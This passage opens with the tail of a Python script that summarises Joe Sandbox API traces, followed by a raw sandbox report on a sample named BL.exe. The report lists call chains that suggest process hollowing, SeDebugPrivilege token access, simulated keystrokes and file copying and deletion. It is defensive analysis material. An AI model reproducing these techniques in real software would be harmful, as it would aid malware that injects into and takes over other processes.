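    return "|".join(names)


def describe(call: ApiCall) -> str:
    """Symbolic reading of the arguments that matter for triage.

    Joe Sandbox prints more stack slots than the API has parameters (CreateFileW
    has seven, the trace shows thirteen), so only the leading slots are read.
    """
    a = call.args
    if call.name == "CreateFileW" and len(a) >= 7:
        return (f"CreateFileW access={decode_flags(as_int(a[1]), GENERIC_ACCESS)} "
                f"share={decode_flags(as_int(a[2]), SHARE_MODE)} "
                f"disposition={DISPOSITION.get(as_int(a[4]), a[4])}")
    if call.name.startswith("RegOpenKeyEx") and a:
        return f"{call.name} root={HKEY_ROOT.get(as_int(a[0]), a[0])}"
    return f"{call.name} ({call.module}) with {len(a)} recorded stack slots"


def triage(text: str) -> List[str]:
    """Parse every trace entry in text and return one summary line per call."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    return [describe(c) for c in calls]


if __name__ == "__main__":
    for summary in triage(SAMPLE):
        print(summary)
```

Running the script prints one summary per entry; the "Source File" line is skipped because it is not a trace entry. The registry path and value name survive as plain string slots (args[8] and args[9] of the RegOpenKeyExW entry), which is what a hunting rule would key on.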
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
• Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
• Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
• Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
• Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
APIs
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
• __lock_file.LIBCMT ref: 00414EE4
  • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
• __fclose_nolock.LIBCMT ref: 00414EEE
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 717694121-0
• Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
• Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03DDBA63
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DDBAF9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DDBB1B
Memory Dump Source
• Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction ID: 1da81ebcbc0dde1ed2edc61285775e5f2b1af53404ac9f84d0c7deb3e38499a0
• Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction Fuzzy Hash: 2F12CE24E24658C6EB24DF64D8507DEB232FF68700F1090E9910DEB7A5E77A4F81CB5A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
• Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
• Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
• Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00401123
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ProcWindow
• String ID:
• API String ID: 181713994-0
• Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
• Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
• Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
• Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
• Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
APIs
  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
• WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
• Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
• Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
• Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00401123
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ProcWindow
• String ID:
• API String ID: 181713994-0
• Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
• Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
• Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
• Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 03DDC2B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                            • API String ID: 1562745308-4164748364
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                            • API String ID: 0-3772701627
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                                                                            • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 3778422247-2988720461
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0044621B
                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                            • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                            • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                            • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                            • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                            • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                            • String ID: $default$winsta0
                                                                                                                            • API String ID: 2173856841-1027155976
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
• MoveFileW.KERNEL32(?,?), ref: 0044BEF5
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
• DeleteFileW.KERNEL32(?), ref: 0044BF17
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
• FindClose.KERNEL32(00000000), ref: 0044BF35
• MoveFileW.KERNEL32(?,?), ref: 0044BF51
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
• FindClose.KERNEL32(00000000), ref: 0044BF7E
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
APIs
• __invoke_watson.LIBCMT ref: 004203A4
  • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
  • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
  • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
  • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
  • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
  • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
• __get_daylight.LIBCMT ref: 004203B0
• __invoke_watson.LIBCMT ref: 004203BF
• __get_daylight.LIBCMT ref: 004203CB
• __invoke_watson.LIBCMT ref: 004203DA
• ____lc_codepage_func.LIBCMT ref: 004203E2
• _strlen.LIBCMT ref: 00420442
• __malloc_crt.LIBCMT ref: 00420449
• _strlen.LIBCMT ref: 0042045F
• _strcpy_s.LIBCMT ref: 0042046D
• __invoke_watson.LIBCMT ref: 00420482
• GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
• WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
• WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
  • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
  • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
  • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
  • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
• __invoke_watson.LIBCMT ref: 004205CC
Similarity
• API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
• String ID: S\
• API String ID: 4084823496-393906132
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
• __swprintf.LIBCMT ref: 00434D91
• _wcslen.LIBCMT ref: 00434D9B
• _wcslen.LIBCMT ref: 00434DB0
• _wcslen.LIBCMT ref: 00434DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
• _memset.LIBCMT ref: 00434E27
• _wcslen.LIBCMT ref: 00434E3C
• _wcsncpy.LIBCMT ref: 00434E6F
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
• CloseHandle.KERNEL32(00000000), ref: 00434EB4
• RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
• CloseHandle.KERNEL32(00000000), ref: 00434ECE
Similarity
• API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 302090198-3457252023
APIs
  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
• GetLastError.KERNEL32 ref: 004644B4
• GetCurrentThread.KERNEL32 ref: 004644C8
• OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
• OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
• String ID: SeDebugPrivilege
• API String ID: 1312810259-2896544425
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
• __wsplitpath.LIBCMT ref: 004038B2
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscpy.LIBCMT ref: 004038C7
• _wcscat.LIBCMT ref: 004038DC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
• _wcscpy.LIBCMT ref: 004039C2
• _wcslen.LIBCMT ref: 00403A53
• _wcslen.LIBCMT ref: 00403AAA
Strings
• Error opening the file, xrefs: 0042B8AC
• Unterminated string, xrefs: 0042B9BA
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
• _, xrefs: 00403B48
Memory Dump Source
